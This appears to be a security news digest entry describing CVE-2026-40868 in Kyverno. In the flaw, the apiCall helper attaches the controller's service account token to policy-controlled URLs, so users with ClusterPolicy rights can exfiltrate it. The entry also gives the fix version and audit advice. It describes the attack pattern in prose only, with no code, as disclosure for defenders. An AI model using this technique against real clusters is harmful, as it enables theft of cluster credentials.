## Critical Confused Deputy Flaw in Kyverno Exposes Service Account Tokens to Attacker-Controlled Endpoints
A high-severity vulnerability in Kyverno, tracked as CVE-2026-40868, allows policy-controlled manipulation to redirect the Kubernetes controller service account token to attacker-controlled endpoints, enabling a classic confused deputy attack. The flaw exists in the apiCall servicecall helper, which implicitly injects Authorization: Bearer tokens when a ClusterPolicy or global context does not explicitly define an Authorization header. Since context.apiCall.service.url is policy-controlled, malicious actors with ClusterPolicy creation rights could craft policies that exfiltrate the Kyverno controller service account token to external servers under their control.

The vulnerability stems from a trust assumption baked into Kyverno's architecture: the apiCall mechanism treats the service URL as a trusted target for internal service account credentials. Namespaced policies are protected by the namespaced urlPath gate in pkg/engine/apicall/apiCall.go, limiting the attack surface to ClusterPolicy and global context usage. This scoping means the flaw does not affect standard namespace-scoped policies, but leaves cluster-wide configurations exposed. All branches prior to the fix—release-1.16, release-1.17, and main—carry the vulnerability.

Kyverno has patched the issue in version 1.16.4. Organizations running affected versions should prioritize upgrading and audit existing ClusterPolicies for any apiCall definitions pointing to external or untrusted URLs. The exposure is particularly concerning in multi-tenant Kubernetes environments where untrusted users may have ClusterPolicy write access. The underlying risk underscores a broader class of vulnerabilities in policy engines: when policy definitions can influence credential usage, the boundary between policy enforcement and credential handling must be strictly controlled.
---
- **Source**: GitHub Issues
- **Sector**: The Lab
- **Tags**: CVE-2026-40868, Kyverno, confused-deputy, Kubernetes, cloud-native
- **Credibility**: unverified
- **Published**: 2026-04-24 03:54:07
- **ID**: 76659
- **URL**: https://whisperx.ai/en/intel/76659